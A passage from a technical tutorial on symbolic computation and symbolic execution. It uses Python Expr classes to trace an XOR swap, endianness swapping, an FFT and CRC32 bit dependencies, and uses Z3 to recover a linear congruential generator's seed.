Since Mathematica has no clue what x is, it's left as is, but 2*8 can be reduced easily, both by Mathematica and by humans, so that is what has been done. At some point in the future, Mathematica's user may assign some number to x, and then Mathematica will reduce the expression even further.

Mathematica does this because it parses the expression and finds some known patterns. This is also called term rewriting[60]. In plain English it may sound like this: "if there is a + operator between two known numbers, replace this subexpression with a computed number which is the sum of these two numbers, if possible". Just like humans do.

Mathematica also has rules like "replace sin(π) by 0" and "replace sin(π/2) by 1", but as you can see, π must be preserved as some kind of symbol instead of a number.

So Mathematica left x as an unknown value. This is, in fact, a common mistake by Mathematica's users: a small typo in an input expression may lead to a huge irreducible expression with the typo left in.

Another example: Mathematica deliberately left this unevaluated while computing a binary logarithm:

In[]:= Log[2, 36]
Out[]= Log[36]/Log[2]

It does so in the hope that at some point in the future, this expression will become a subexpression in another expression, and it will be reduced nicely at the very end.
But if we really need a numerical answer, we can force Mathematica to calculate it:

In[]:= Log[2, 36] // N
Out[]= 5.16993

Sometimes unresolved values are desirable:

In[]:= Union[{a, b, a, c}, {d, a, e, b}, {c, a}]
Out[]= {a, b, c, d, e}

Characters in the expression are just unresolved symbols[61] with no connections to numbers or other expressions, so Mathematica left them as is.

Another real-world example is symbolic integration[62], i.e., finding the formula for an integral by rewriting the initial expression using some predefined rules. Mathematica also does it:

In[]:= Integrate[1/(x^5), x]
Out[]= -(1/(4 x^4))

The benefits of symbolic computation are obvious: it is not prone to loss of significance[63] and round-off errors[64]. But the drawbacks are also obvious: you need to store the expression in a (possibly huge) tree and process it many times. Term rewriting is also slow. All these things are extremely clumsy in comparison to a fast FPU.

"Symbolic computation" is opposed to "numerical computation"; the latter is just processing numbers step-by-step, using a calculator, CPU or FPU. Some tasks can be solved better by the first method, some others by the second.

[56] http://boomerang.sourceforge.net/, http://www.program-transformation.org/Transform/MikeVanEmmerik, thesis: https://yurichev.com/mirrors/vanEmmerik_ssa.pdf
[57] https://en.wikipedia.org/wiki/Symbolic_computation
[58] https://en.wikipedia.org/wiki/Arbitrary-precision_arithmetic
[59] Other well-known symbolic computation systems are Maxima and SymPy.
[60] https://en.wikipedia.org/wiki/Rewriting

8.1.1 Rational data type

Some LISP implementations can store a number as a ratio/fraction[65], i.e., placing two numbers in a cell (which, in this case, is called an atom in LISP lingo). For example, you divide 1 by 3, and the interpreter, understanding that 1/3 is an irreducible fraction[66], creates a cell with the numbers 1 and 3. Some time after, you may multiply this cell by 6, and the multiplication function inside the LISP interpreter may return a much better result (2, without any noise). The printing function in the interpreter can also print something like 1 / 3 instead of a floating point number.
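Python's standard library offers exactly this kind of rational arithmetic in its fractions module, which is a quick way to see the behaviour described above (my own illustration, not from the original text):

```python
from fractions import Fraction

# 1 divided by 3 is kept as an exact irreducible ratio, not a float
x = Fraction(1, 3)
print(x)       # -> 1/3

# multiplying the ratio by 6 gives exactly 2, with no floating point noise
print(x * 6)   # -> 2
```

Just as with the LISP cells described above, the result of `x * 6` collapses back to a plain integer value, because the interpreter reduces the fraction 6/3 automatically.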
This is sometimes called "fractional arithmetic" [see Donald E. Knuth, The Art of Computer Programming, 3rd ed., (1997), 4.5.1, page 330].

This is not symbolic computation in any way, but it is slightly better than storing ratios/fractions as just floating point numbers. The drawbacks are clearly visible: you need more memory to store a ratio instead of a single number, and all arithmetic functions are more complex and slower, because they must handle both numbers and ratios.

Perhaps because of these drawbacks, some programming languages offer a separate (rational) data type, either as a language feature or supported by a library[67]: Haskell, OCaml, Perl, Ruby, Python, Smalltalk, Java, Clojure, C/C++[68].

8.2 Symbolic execution

8.2.1 Swapping two values using XOR

There is a well-known (but counterintuitive) algorithm for swapping two values in two variables using the XOR operation, without the use of any additional memory/register:

X=X^Y
Y=Y^X
X=X^Y

How does it work? It would be better to construct an expression at each step of execution.

#!/usr/bin/env python

class Expr:
    def __init__(self,s):
        self.s=s
    def __str__(self):
        return self.s
    def __xor__(self, other):
        return Expr("(" + self.s + "^" + other.s + ")")

def XOR_swap(X, Y):
    X=X^Y
    Y=Y^X
    X=X^Y
    return X, Y

new_X, new_Y=XOR_swap(Expr("X"), Expr("Y"))
print "new_X", new_X
print "new_Y", new_Y

[61] A symbol, like in LISP
[62] https://en.wikipedia.org/wiki/Symbolic_integration
[63] https://en.wikipedia.org/wiki/Loss_of_significance
[64] https://en.wikipedia.org/wiki/Round-off_error
[65] https://en.wikipedia.org/wiki/Rational_data_type
[66] https://en.wikipedia.org/wiki/Irreducible_fraction
[67] A more detailed list: https://en.wikipedia.org/wiki/Rational_data_type
[68] Via the GNU Multiple Precision Arithmetic Library

It works because Python is a dynamically typed PL, so the function doesn't care what it operates on: numerical values, or objects of the Expr() class. Here is the result:

new_X ((X^Y)^(Y^(X^Y)))
new_Y (Y^(X^Y))

You can remove the duplicated variables in your mind (since XORing by a value twice results in nothing). In new_X we can drop two X-es and two Y-es, and a single Y will be left. In new_Y we can drop two Y-es, and a single X will be left.

8.2.2 Change endianness

What does this code do?
mov eax, ecx
mov edx, ecx
shl edx, 16
and eax, 0000ff00H
or  eax, edx
mov edx, ecx
and edx, 00ff0000H
shr ecx, 16
or  edx, ecx
shl eax, 8
shr edx, 8
or  eax, edx

In fact, many reverse engineers play the shell game a lot, keeping track of what is stored where at each point in time.

Figure 8: Hieronymus Bosch – The Conjurer

Again, we can build an equivalent function which can take both numerical variables and Expr() objects. We also extend the Expr() class to support many arithmetical and boolean operations. In addition, Expr() methods take both Expr() objects and integer values on input.

#!/usr/bin/env python

class Expr:
    def __init__(self,s):
        self.s=s
    def convert_to_Expr_if_int(self, n):
        if isinstance(n, int):
            return Expr(str(n))
        if isinstance(n, Expr):
            return n
        raise AssertionError # unsupported type
    def __str__(self):
        return self.s
    def __xor__(self, other):
        return Expr("(" + self.s + "^" + self.convert_to_Expr_if_int(other).s + ")")
    def __and__(self, other):
        return Expr("(" + self.s + "&" + self.convert_to_Expr_if_int(other).s + ")")
    def __or__(self, other):
        return Expr("(" + self.s + "|" + self.convert_to_Expr_if_int(other).s + ")")
    def __lshift__(self, other):
        return Expr("(" + self.s + "<<" + self.convert_to_Expr_if_int(other).s + ")")
    def __rshift__(self, other):
        return Expr("(" + self.s + ">>" + self.convert_to_Expr_if_int(other).s + ")")

# change endianness

ecx=Expr("initial_ECX") # 1st argument
eax=ecx                 # mov eax, ecx
edx=ecx                 # mov edx, ecx
edx=edx<<16             # shl edx, 16
eax=eax&0xff00          # and eax, 0000ff00H
eax=eax|edx             # or eax, edx
edx=ecx                 # mov edx, ecx
edx=edx&0x00ff0000      # and edx, 00ff0000H
ecx=ecx>>16             # shr ecx, 16
edx=edx|ecx             # or edx, ecx
eax=eax<<8              # shl eax, 8
edx=edx>>8              # shr edx, 8
eax=eax|edx             # or eax, edx

print eax

I run it:

((((initial_ECX&65280)|(initial_ECX<<16))<<8)|(((initial_ECX&16711680)|(initial_ECX>>16))>>8))

Now this is something more readable, though a bit LISPy at first sight. In fact, this is a function which changes the endianness of a 32-bit word. By the way, my Toy Decompiler can do this job as well, but it operates on an AST instead of plain strings: see 7.
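To double-check that conclusion, here is a small sketch of my own (not part of the original text) that replays the same instruction sequence on a concrete 32-bit value, truncating to 32 bits after each shift, as the CPU would:

```python
MASK = 0xFFFFFFFF  # registers are 32 bits wide

def change_endianness(ecx):
    eax = ecx                      # mov eax, ecx
    edx = (ecx << 16) & MASK       # mov edx, ecx / shl edx, 16
    eax &= 0x0000ff00              # and eax, 0000ff00H
    eax |= edx                     # or  eax, edx
    edx = ecx & 0x00ff0000         # mov edx, ecx / and edx, 00ff0000H
    edx |= ecx >> 16               # shr ecx, 16 / or edx, ecx
    eax = (eax << 8) & MASK        # shl eax, 8
    edx >>= 8                      # shr edx, 8
    return eax | edx               # or  eax, edx

print(hex(change_endianness(0x11223344)))   # -> 0x44332211
```

The bytes come out in reverse order, confirming that the sequence is a 32-bit byte swap; applying the function twice returns the original value.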
8.2.3 Fast Fourier transform

I've found one of the smallest possible FFT implementations on reddit:

#!/usr/bin/env python
from cmath import exp,pi

def FFT(X):
    n = len(X)
    w = exp(-2*pi*1j/n)
    if n > 1:
        X = FFT(X[::2]) + FFT(X[1::2])
        for k in xrange(n/2):
            xk = X[k]
            X[k] = xk + w**k*X[k+n/2]
            X[k+n/2] = xk - w**k*X[k+n/2]
    return X

print FFT([1,2,3,4,5,6,7,8])

Just out of interest: what value does each element have on output?

#!/usr/bin/env python
from cmath import exp,pi

class Expr:
    def __init__(self,s):
        self.s=s
    def convert_to_Expr_if_int(self, n):
        if isinstance(n, int):
            return Expr(str(n))
        if isinstance(n, Expr):
            return n
        raise AssertionError # unsupported type
    def __str__(self):
        return self.s
    def __add__(self, other):
        return Expr("(" + self.s + "+" + self.convert_to_Expr_if_int(other).s + ")")
    def __sub__(self, other):
        return Expr("(" + self.s + "-" + self.convert_to_Expr_if_int(other).s + ")")
    def __mul__(self, other):
        return Expr("(" + self.s + "*" + self.convert_to_Expr_if_int(other).s + ")")
    def __pow__(self, other):
        return Expr("(" + self.s + "**" + self.convert_to_Expr_if_int(other).s + ")")

def FFT(X):
    n = len(X)
    # cast complex value to string, and then to Expr
    w = Expr(str(exp(-2*pi*1j/n)))
    if n > 1:
        X = FFT(X[::2]) + FFT(X[1::2])
        for k in xrange(n/2):
            xk = X[k]
            X[k] = xk + w**k*X[k+n/2]
            X[k+n/2] = xk - w**k*X[k+n/2]
    return X

input=[Expr("input_%d" % i) for i in range(8)]
output=FFT(input)
for i in range(len(output)):
    print i, ":", output[i]

The FFT() function is left almost intact; the only thing I added is that the complex value is converted into a string, and then an Expr() object is constructed.
0 : (((input_0+(((-1-1.22464679915e-16j)**0)*input_4))+(((6.12323399574e-17-1j)**0)*(input_2+(((-1-1.22464679915 e-16j)**0)*input_6))))+(((0.707106781187-0.707106781187j)**0)*((input_1+(((-1-1.22464679915e-16j)**0)* input_5))+(((6.12323399574e-17-1j)**0)*(input_3+(((-1-1.22464679915e-16j)**0)*input_7)))))) 1 : (((input_0-(((-1-1.22464679915e-16j)**0)*input_4))+(((6.12323399574e-17-1j)**1)*(input_2-(((-1-1.22464679915 e-16j)**0)*input_6))))+(((0.707106781187-0.707106781187j)**1)*((input_1-(((-1-1.22464679915e-16j)**0)* input_5))+(((6.12323399574e-17-1j)**1)*(input_3-(((-1-1.22464679915e-16j)**0)*input_7)))))) 2 : (((input_0+(((-1-1.22464679915e-16j)**0)*input_4))-(((6.12323399574e-17-1j)**0)*(input_2+(((-1-1.22464679915 e-16j)**0)*input_6))))+(((0.707106781187-0.707106781187j)**2)*((input_1+(((-1-1.22464679915e-16j)**0)* input_5))-(((6.12323399574e-17-1j)**0)*(input_3+(((-1-1.22464679915e-16j)**0)*input_7)))))) 3 : (((input_0-(((-1-1.22464679915e-16j)**0)*input_4))-(((6.12323399574e-17-1j)**1)*(input_2-(((-1-1.22464679915 e-16j)**0)*input_6))))+(((0.707106781187-0.707106781187j)**3)*((input_1-(((-1-1.22464679915e-16j)**0)* input_5))-(((6.12323399574e-17-1j)**1)*(input_3-(((-1-1.22464679915e-16j)**0)*input_7)))))) 4 : (((input_0+(((-1-1.22464679915e-16j)**0)*input_4))+(((6.12323399574e-17-1j)**0)*(input_2+(((-1-1.22464679915 e-16j)**0)*input_6))))-(((0.707106781187-0.707106781187j)**0)*((input_1+(((-1-1.22464679915e-16j)**0)* input_5))+(((6.12323399574e-17-1j)**0)*(input_3+(((-1-1.22464679915e-16j)**0)*input_7)))))) 5 : (((input_0-(((-1-1.22464679915e-16j)**0)*input_4))+(((6.12323399574e-17-1j)**1)*(input_2-(((-1-1.22464679915 e-16j)**0)*input_6))))-(((0.707106781187-0.707106781187j)**1)*((input_1-(((-1-1.22464679915e-16j)**0)* input_5))+(((6.12323399574e-17-1j)**1)*(input_3-(((-1-1.22464679915e-16j)**0)*input_7)))))) 6 : (((input_0+(((-1-1.22464679915e-16j)**0)*input_4))-(((6.12323399574e-17-1j)**0)*(input_2+(((-1-1.22464679915 
e-16j)**0)*input_6))))-(((0.707106781187-0.707106781187j)**2)*((input_1+(((-1-1.22464679915e-16j)**0)*input_5))-(((6.12323399574e-17-1j)**0)*(input_3+(((-1-1.22464679915e-16j)**0)*input_7))))))
7 : (((input_0-(((-1-1.22464679915e-16j)**0)*input_4))-(((6.12323399574e-17-1j)**1)*(input_2-(((-1-1.22464679915e-16j)**0)*input_6))))-(((0.707106781187-0.707106781187j)**3)*((input_1-(((-1-1.22464679915e-16j)**0)*input_5))-(((6.12323399574e-17-1j)**1)*(input_3-(((-1-1.22464679915e-16j)**0)*input_7))))))

We can see subexpressions of the form x^0 and x^1. We can eliminate them, since x^0 = 1 and x^1 = x; likewise, multiplications by 1 can be dropped:

    def __mul__(self, other):
        op1=self.s
        op2=self.convert_to_Expr_if_int(other).s
        if op1=="1":
            return Expr(op2)
        if op2=="1":
            return Expr(op1)
        return Expr("(" + op1 + "*" + op2 + ")")

    def __pow__(self, other):
        op2=self.convert_to_Expr_if_int(other).s
        if op2=="0":
            return Expr("1")
        if op2=="1":
            return Expr(self.s)
        return Expr("(" + self.s + "**" + op2 + ")")

0 : (((input_0+input_4)+(input_2+input_6))+((input_1+input_5)+(input_3+input_7)))
1 : (((input_0-input_4)+((6.12323399574e-17-1j)*(input_2-input_6)))+((0.707106781187-0.707106781187j)*((input_1-input_5)+((6.12323399574e-17-1j)*(input_3-input_7)))))
2 : (((input_0+input_4)-(input_2+input_6))+(((0.707106781187-0.707106781187j)**2)*((input_1+input_5)-(input_3+input_7))))
3 : (((input_0-input_4)-((6.12323399574e-17-1j)*(input_2-input_6)))+(((0.707106781187-0.707106781187j)**3)*((input_1-input_5)-((6.12323399574e-17-1j)*(input_3-input_7)))))
4 : (((input_0+input_4)+(input_2+input_6))-((input_1+input_5)+(input_3+input_7)))
5 : (((input_0-input_4)+((6.12323399574e-17-1j)*(input_2-input_6)))-((0.707106781187-0.707106781187j)*((input_1-input_5)+((6.12323399574e-17-1j)*(input_3-input_7)))))
6 : (((input_0+input_4)-(input_2+input_6))-(((0.707106781187-0.707106781187j)**2)*((input_1+input_5)-(input_3+input_7))))
7 :
(((input_0-input_4)-((6.12323399574e-17-1j)*(input_2-input_6)))-(((0.707106781187-0.707106781187j)**3)*((input_1-input_5)-((6.12323399574e-17-1j)*(input_3-input_7)))))

8.2.4 Cyclic redundancy check

I've always wondered which input bit affects which bit in the final CRC32 value.

From CRC[69] theory (a good and concise introduction: http://web.archive.org/web/20161220015646/http://www.hackersdelight.org/crc.pdf) we know that CRC is a shifting register with taps.

We will track each bit rather than each byte or word, which is highly inefficient, but serves our purpose better:

#!/usr/bin/env python
import sys

class Expr:
    def __init__(self,s):
        self.s=s
    def convert_to_Expr_if_int(self, n):
        if isinstance(n, int):
            return Expr(str(n))
        if isinstance(n, Expr):
            return n
        raise AssertionError # unsupported type
    def __str__(self):
        return self.s
    def __xor__(self, other):
        return Expr("(" + self.s + "^" + self.convert_to_Expr_if_int(other).s + ")")

BYTES=1

def crc32(buf):
    #state=[Expr("init_%d" % i) for i in range(32)]
    state=[Expr("1") for i in range(32)]
    for byte in buf:
        for n in range(8):
            bit=byte[n]
            to_taps=bit^state[31]
            state[31]=state[30]
            state[30]=state[29]
            state[29]=state[28]
            state[28]=state[27]
            state[27]=state[26]
            state[26]=state[25]^to_taps
            state[25]=state[24]
            state[24]=state[23]
            state[23]=state[22]^to_taps
            state[22]=state[21]^to_taps
            state[21]=state[20]
            state[20]=state[19]
            state[19]=state[18]
            state[18]=state[17]
            state[17]=state[16]
            state[16]=state[15]^to_taps
            state[15]=state[14]
            state[14]=state[13]
            state[13]=state[12]
            state[12]=state[11]^to_taps
            state[11]=state[10]^to_taps
            state[10]=state[9]^to_taps
            state[9]=state[8]
            state[8]=state[7]^to_taps
            state[7]=state[6]^to_taps
            state[6]=state[5]
            state[5]=state[4]^to_taps
            state[4]=state[3]^to_taps
            state[3]=state[2]
            state[2]=state[1]^to_taps
            state[1]=state[0]^to_taps
            state[0]=to_taps
    for i in range(32):
        print "state %d=%s" % (i, state[31-i])

buf=[[Expr("in_%d_%d" % (byte, bit)) for bit in range(8)] for byte in range(BYTES)]
crc32(buf)

[69] Cyclic redundancy check
Here are the expressions for each CRC32 bit for a 1-byte buffer:

state 0=(1^(in_0_2^1))
state 1=((1^(in_0_0^1))^(in_0_3^1))
state 2=(((1^(in_0_0^1))^(in_0_1^1))^(in_0_4^1))
state 3=(((1^(in_0_1^1))^(in_0_2^1))^(in_0_5^1))
state 4=(((1^(in_0_2^1))^(in_0_3^1))^(in_0_6^(1^(in_0_0^1))))
state 5=(((1^(in_0_3^1))^(in_0_4^1))^(in_0_7^(1^(in_0_1^1))))
state 6=((1^(in_0_4^1))^(in_0_5^1))
state 7=((1^(in_0_5^1))^(in_0_6^(1^(in_0_0^1))))
state 8=(((1^(in_0_0^1))^(in_0_6^(1^(in_0_0^1))))^(in_0_7^(1^(in_0_1^1))))
state 9=((1^(in_0_1^1))^(in_0_7^(1^(in_0_1^1))))
state 10=(1^(in_0_2^1))
state 11=(1^(in_0_3^1))
state 12=((1^(in_0_0^1))^(in_0_4^1))
state 13=(((1^(in_0_0^1))^(in_0_1^1))^(in_0_5^1))
state 14=((((1^(in_0_0^1))^(in_0_1^1))^(in_0_2^1))^(in_0_6^(1^(in_0_0^1))))
state 15=((((1^(in_0_1^1))^(in_0_2^1))^(in_0_3^1))^(in_0_7^(1^(in_0_1^1))))
state 16=((((1^(in_0_0^1))^(in_0_2^1))^(in_0_3^1))^(in_0_4^1))
state 17=(((((1^(in_0_0^1))^(in_0_1^1))^(in_0_3^1))^(in_0_4^1))^(in_0_5^1))
state 18=(((((1^(in_0_1^1))^(in_0_2^1))^(in_0_4^1))^(in_0_5^1))^(in_0_6^(1^(in_0_0^1))))
state 19=((((((1^(in_0_0^1))^(in_0_2^1))^(in_0_3^1))^(in_0_5^1))^(in_0_6^(1^(in_0_0^1))))^(in_0_7^(1^(in_0_1^1))))
state 20=((((((1^(in_0_0^1))^(in_0_1^1))^(in_0_3^1))^(in_0_4^1))^(in_0_6^(1^(in_0_0^1))))^(in_0_7^(1^(in_0_1^1))))
state 21=(((((1^(in_0_1^1))^(in_0_2^1))^(in_0_4^1))^(in_0_5^1))^(in_0_7^(1^(in_0_1^1))))
state 22=(((((1^(in_0_0^1))^(in_0_2^1))^(in_0_3^1))^(in_0_5^1))^(in_0_6^(1^(in_0_0^1))))
state 23=((((((1^(in_0_0^1))^(in_0_1^1))^(in_0_3^1))^(in_0_4^1))^(in_0_6^(1^(in_0_0^1))))^(in_0_7^(1^(in_0_1^1))))
state 24=((((((in_0_0^1)^(in_0_1^1))^(in_0_2^1))^(in_0_4^1))^(in_0_5^1))^(in_0_7^(1^(in_0_1^1))))
state 25=(((((in_0_1^1)^(in_0_2^1))^(in_0_3^1))^(in_0_5^1))^(in_0_6^(1^(in_0_0^1))))
state 26=(((((in_0_2^1)^(in_0_3^1))^(in_0_4^1))^(in_0_6^(1^(in_0_0^1))))^(in_0_7^(1^(in_0_1^1))))
state 27=((((in_0_3^1)^(in_0_4^1))^(in_0_5^1))^(in_0_7^(1^(in_0_1^1))))
state 28=(((in_0_4^1)^(in_0_5^1))^(in_0_6^(1^(in_0_0^1))))
state 29=(((in_0_5^1)^(in_0_6^(1^(in_0_0^1))))^(in_0_7^(1^(in_0_1^1))))
state 30=((in_0_6^(1^(in_0_0^1)))^(in_0_7^(1^(in_0_1^1))))
state 31=(in_0_7^(1^(in_0_1^1)))

For larger buffers, the expressions grow exponentially. This is the 0th bit of the final state for a 4-byte buffer:

state 0=((((((((((((((in_0_0^1)^(in_0_1^1))^(in_0_2^1))^(in_0_4^1))^(in_0_5^1))^(in_0_7^(1^(in_0_1^1))))^(in_1_0^(1^(in_0_2^1))))^(in_1_2^(((1^(in_0_0^1))^(in_0_1^1))^(in_0_4^1))))^(in_1_3^(((1^(in_0_1^1))^(in_0_2^1))^(in_0_5^1))))^(in_1_4^(((1^(in_0_2^1))^(in_0_3^1))^(in_0_6^(1^(in_0_0^1))))))^(in_2_0^((((1^(in_0_0^1))^(in_0_6^(1^(in_0_0^1))))^(in_0_7^(1^(in_0_1^1))))^(in_1_2^(((1^(in_0_0^1))^(in_0_1^1))^(in_0_4^1))))))^(in_2_6^(((((((1^(in_0_0^1))^(in_0_1^1))^(in_0_2^1))^(in_0_6^(1^(in_0_0^1))))^(in_1_4^(((1^(in_0_2^1))^(in_0_3^1))^(in_0_6^(1^(in_0_0^1))))))^(in_1_5^(((1^(in_0_3^1))^(in_0_4^1))^(in_0_7^(1^(in_0_1^1))))))^(in_2_0^((((1^(in_0_0^1))^(in_0_6^(1^(in_0_0^1))))^(in_0_7^(1^(in_0_1^1))))^(in_1_2^(((1^(in_0_0^1))^(in_0_1^1))^(in_0_4^1))))))))^(in_2_7^(((((((1^(in_0_1^1))^(in_0_2^1))^(in_0_3^1))^(in_0_7^(1^(in_0_1^1))))^(in_1_5^(((1^(in_0_3^1))^(in_0_4^1))^(in_0_7^(1^(in_0_1^1))))))^(in_1_6^(((1^(in_0_4^1))^(in_0_5^1))^(in_1_0^(1^(in_0_2^1))))))^(in_2_1^((((1^(in_0_1^1))^(in_0_7^(1^(in_0_1^1))))^(in_1_0^(1^(in_0_2^1))))^(in_1_3^(((1^(in_0_1^1))^(in_0_2^1))^(in_0_5^1))))))))^(in_3_2^(((((((((1^(in_0_1^1))^(in_0_2^1))^(in_0_4^1))^(in_0_5^1))^(in_0_6^(1^(in_0_0^1))))^(in_1_2^(((1^(in_0_0^1))^(in_0_1^1))^(in_0_4^1))))^(in_2_0^((((1^(in_0_0^1))^(in_0_6^(1^(in_0_0^1))))^(in_0_7^(1^(in_0_1^1))))^(in_1_2^(((1^(in_0_0^1))^(in_0_1^1))^(in_0_4^1))))))^(in_2_1^((((1^(in_0_1^1))^(in_0_7^(1^(in_0_1^1))))^(in_1_0^(1^(in_0_2^1))))^(in_1_3^(((1^(in_0_1^1))^(in_0_2^1))^(in_0_5^1))))))^(in_2_4^(((((1^(in_0_0^1))^(in_0_4^1))^(in_1_2^(((1^(in_0_0^1))^(in_0_1^1))^(in_0_4^1))))^(in_1_3^(((1^(in_0_1^1))^(in_0_2^1))^(in_0_5^1))))^(in_1_6^(((1^(in_0_4^1))^(in_0_5^1))^(in_1_0^(1^(in_0_2^1))))))))))
The expression for the 0th bit of the final state for an 8-byte buffer has a length of about 350 KiB. It could, of course, be reduced significantly (because this expression is basically a XOR tree), but you can feel the weight of it.

Now we can process these expressions somehow to get a smaller picture of what affects what. Let's say, if we can find the "in_2_3" substring in an expression, this means that the 3rd bit of the 2nd byte of input affects this expression. But even more than that: since this is a XOR tree (i.e., an expression consisting only of XOR operations), if some input variable occurs twice, it is annihilated, since x^x = 0. More than that: if a variable occurs an even number of times (2, 4, 8, etc.), it is annihilated, but it is left if it occurs an odd number of times (1, 3, 5, etc.).

for i in range(32):
    #print "state %d=%s" % (i, state[31-i])
    sys.stdout.write ("state %02d: " % i)
    for byte in range(BYTES):
        for bit in range(8):
            s="in_%d_%d" % (byte, bit)
            if str(state[31-i]).count(s) & 1:
                sys.stdout.write ("*")
            else:
                sys.stdout.write (" ")
    sys.stdout.write ("\n")

(https://github.com/dennis714/SAT_SMT_article/blob/master/symbolic/4_CRC/2.py)

Now this is how each bit of a 1-byte input buffer affects each bit of the final CRC32 state:

state 00: *
state 01: * *
state 02: ** *
state 03: ** *
state 04: * ** *
state 05: * ** *
state 06: **
state 07: * **
state 08: * **
state 09: *
state 10: *
state 11: *
state 12: * *
state 13: ** *
state 14: ** *
state 15: ** *
state 16: * ***
state 17: ** ***
state 18: *** ***
state 19: *** ***
state 20: ** **
state 21: * ** *
state 22: ** **
state 23: ** **
state 24: * * ** *
state 25: **** **
state 26: ***** **
state 27: * *** *
state 28: * ***
state 29: ** ***
state 30: ** **
state 31: * *

This is 8*8 = 64 bits of an 8-byte input buffer:

state 00: * ** * *** * ** ** * * ***** *** * * ** *
state 01: * * ** * *** * ** ** * * ***** *** * * ** *
state 02: ** * ** * *** * ** ** * * ***** *** * * ** *
state 03: *** * ** * *** * ** ** * * ***** *** * * ** *
state 04: **** * ** * *** * ** ** * * ***** *** * * ** *
state 05: **** * ** * *** * ** ** * * ***** *** * * ** *
state 06: ** *** ** ** * ** *** * * ** ** *** * * * **
state 07: * ** *** ** ** * ** *** * * ** ** *** * * * **
state 08: * ** *** ** ** * ** *** * * ** ** *** * * * **
state 09: *** ** * * ** *** * ***** * * ** ** ** * * ** * *
state 10: ** * *** * * * * ** * * ** * * ** * ** *
state 11: ** * *** * * * * ** * * ** * * ** * ** *
state 12: ** * *** * * * * ** * * ** * * ** * ** *
state 13: ** * *** * * * * ** * * ** * * ** * ** *
state 14: ** * *** * * * * ** * * ** * * ** * ** *
state 15: ** * *** * * * * ** * * ** * * ** * ** *
state 16: * ** ****** ** ** ** * * * ** * ** * *** ***
state 17: * * ** ****** ** ** ** * * * ** * ** * *** ***
state 18: * * ** ****** ** ** ** * * * ** * ** * *** ***
state 19: * * * ** ****** ** ** ** * * * ** * ** * *** ***
state 20: ****** ** ** *** ** * * * ***** * **** * * ** **
state 21: ** *** ** * * * ** ** *** ** * * * ** * * ** *
state 22: ** * * *** ** ** * ** ***** * ** * *** * ** **
state 23: * ** * * *** ** ** * ** ***** * ** * *** * ** **
state 24: * *** * *** *** *** * * * * ** ***** ** * ** * ** *
state 25: * * *** *** * * **** * ** * *** * * ***** **
state 26: * * * *** *** * * **** * ** * *** * * ***** **
state 27: * *** * ***** **** * *** ** *** * ** * * *** *
state 28: *** * *** * ***** *** * * *** ** **** ***
state 29: *** * *** * ***** *** * * *** ** **** ***
state 30: ** *** * * *** ** * ** *** ** * ** *** * ** **
state 31: * ** * *** * ** ** * * ***** *** * * ** * *

8.2.5 Linear congruential generator

This is a popular PRNG[70] from the OpenWatcom CRT[71] library: https://github.com/open-watcom/open-watcom-v2/blob/d468b609ba6ca61eeddad80dd2485e3256fc5261/bld/clib/math/c/rand.c.

What expression does it generate on each step?
#!/usr/bin/env python

class Expr:
    def __init__(self,s):
        self.s=s
    def convert_to_Expr_if_int(self, n):
        if isinstance(n, int):
            return Expr(str(n))
        if isinstance(n, Expr):
            return n
        raise AssertionError # unsupported type
    def __str__(self):
        return self.s
    def __xor__(self, other):
        return Expr("(" + self.s + "^" + self.convert_to_Expr_if_int(other).s + ")")
    def __mul__(self, other):
        return Expr("(" + self.s + "*" + self.convert_to_Expr_if_int(other).s + ")")
    def __add__(self, other):
        return Expr("(" + self.s + "+" + self.convert_to_Expr_if_int(other).s + ")")
    def __and__(self, other):
        return Expr("(" + self.s + "&" + self.convert_to_Expr_if_int(other).s + ")")
    def __rshift__(self, other):
        return Expr("(" + self.s + ">>" + self.convert_to_Expr_if_int(other).s + ")")

seed=Expr("initial_seed")

def rand():
    global seed
    seed=seed*1103515245+12345
    return (seed>>16) & 0x7fff

for i in range(10):
    print i, ":", rand()

[70] Pseudorandom number generator
[71] C runtime library

0 : ((((initial_seed*1103515245)+12345)>>16)&32767)
1 : ((((((initial_seed*1103515245)+12345)*1103515245)+12345)>>16)&32767)
2 : ((((((((initial_seed*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)>>16)&32767)
3 : ((((((((((initial_seed*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)>>16)&32767)
4 : ((((((((((((initial_seed*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)>>16)&32767)
5 : ((((((((((((((initial_seed*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)>>16)&32767)
6 : ((((((((((((((((initial_seed*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)>>16)&32767)
7 : ((((((((((((((((((initial_seed*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)>>16)&32767)
8 :
((((((((((((((((((((initial_seed*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)>>16)&32767)
9 : ((((((((((((((((((((((initial_seed*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)>>16)&32767)

Now, if we once got several values from this PRNG, like 4583, 16304, 14440, 32315, 28670, 12568..., how would we recover the initial seed? The problem, in fact, is solving a system of equations:

((((initial_seed*1103515245)+12345)>>16)&32767)==4583
((((((initial_seed*1103515245)+12345)*1103515245)+12345)>>16)&32767)==16304
((((((((initial_seed*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)>>16)&32767)==14440
((((((((((initial_seed*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)>>16)&32767)==32315

As it turns out, Z3 can solve this system correctly using only the first two equations:

#!/usr/bin/env python
from z3 import *

s=Solver()
x=BitVec("x",32)
a=1103515245
c=12345
s.add((((x*a)+c)>>16)&32767==4583)
s.add((((((x*a)+c)*a)+c)>>16)&32767==16304)
#s.add((((((((x*a)+c)*a)+c)*a)+c)>>16)&32767==14440)
#s.add((((((((((x*a)+c)*a)+c)*a)+c)*a)+c)>>16)&32767==32315)
s.check()
print s.model()

[x = 11223344]

(Though it takes about 20 seconds on my ancient Intel Atom netbook.)

8.2.6 Path constraint

How do you get the weekday from a UNIX timestamp?

#!/usr/bin/env python

input=...

SECS_DAY=24*60*60

dayno = input / SECS_DAY
